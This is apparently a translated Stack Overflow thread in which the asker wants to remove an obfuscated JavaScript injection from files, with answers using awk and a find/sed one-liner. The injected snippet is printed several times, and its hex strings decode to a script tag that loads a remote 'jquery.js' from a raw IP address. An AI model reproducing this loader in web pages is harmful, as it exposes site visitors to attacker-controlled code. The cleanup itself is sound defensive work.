使用sed替换复杂模式

时间:2017-02-01 13:37:50

标签: regex perl awk sed

我想使用sed命令替换模式。要删除的图案如下所示,带有空格。

var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]]\(_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]]\(_0xaae8[0]))

现在我需要用空格替换上面的模式。这个模式可以在文件中的任何位置(即可以在文件/文件末尾或某些字符串之间开始)

通过sed删除正则表达式的任何提示?

感谢。

2 个答案:

答案 0 :(得分:2)

$ cat r.awk
#!/usr/bin/awk -f

NR == FNR { # read a first file with a string to match
    str = $0
    rep = " " # replace by `rep'
    RS = "$^" # regexp which never matches => the next record will be
              # a string with a whole second file
    nextfile
}

{
    file = $0; ans = ""
    while (i = index(file, str)) {
        pre  = substr(file, 1              , i - 1)  # parts before
        post = substr(file, i + length(str))         # and after `str'
        ans  = ans pre rep # append to the output
        file = post
    }
    ans = ans file
    printf "%s", ans
}

将字符串存储在文件

$ cat r.txt
var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]]\(_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]]\(_0xaae8[0]))

一个例子

$ cat f.txt
BEFORE
var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]]\(_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]]\(_0xaae8[0]))
AFTER
var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]]\(_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]]\(_0xaae8[0]))
END

用法:

$ awk -f r.awk r.txt f.txt

BEFORE

AFTER

END

答案 1 :(得分:1)

使用findsed命令在一行中实现“仅删除模式”的另一种方法:

$ find /path/to/files/ -type f \( -name "*.js" -o -name "*.json" \) -exec sh -c 'sed -i "s/var\s_0xaae8.*_0xaae8\[0\]))//" "$0"' {} \;

上述命令将在特定路径下进行搜索,如果从包含这些扩展程序jsjson的任何文件中找到该模式,则会将其删除。

仅适用于JS:

$ find /path/to/files/ -type f -name "*.js" -exec sed -i "s/var\s_0xaae8.*_0xaae8\[0\]))//" '{}' \;

如果您要搜索任何带有任何扩展名的文件,请随意删除-name "*.x"部分